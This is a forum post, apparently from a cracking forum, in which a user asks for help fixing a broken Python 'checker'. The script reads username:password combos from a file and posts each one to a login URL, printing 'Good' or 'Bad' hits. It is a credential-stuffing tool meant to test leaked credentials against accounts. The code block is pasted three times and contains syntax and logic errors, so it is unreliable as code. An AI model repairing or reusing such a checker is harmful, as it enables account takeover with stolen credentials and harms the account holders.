OP 20 November, 2022 - 04:32 PM
Hey im curious how to fix this lol checker can smn tell me where is my problem
import requests
combolists = open("combo.txt", "r").readlines
url= ""
for combo in combolist:
seq = combo.strip()
acc = seq.split(":")
username = acc[0]
password = acc [1]
account = username + ":" + password
headers = {
"Content-Type" : "",
"User-Agent": "
"uname": username,
"pass": password
}
req = requests.post(url, data=headers).text
if not "Username" in req:
print("Good: " + account)
else:
print("Bad: " + account)
Hey im curious hpw to fix this lol checker can smn tell me where is my problem
import requests
combolists = open("combo.txt", "r").readlines
url= ""
for combo in combolist:
seq = combo.strip()
acc = seq.split(":")
username = acc[0]
password = acc [1]
account = username + ":" + password
headers = {
"Content-Type" : "",
"User-Agent": "
"uname": username,
"pass": password
}
req = requests.post(url, data=headers).text
if not "Username" in req:
print("Good: " + account)
else:
print("Bad: " + account)
Hey im curious hpw to fix this lol checker can smn tell me where is my problem
REPORT LEACHERS LEAVE A LIKE OR IM CHECKING :)
:weebsout:
:weebsout: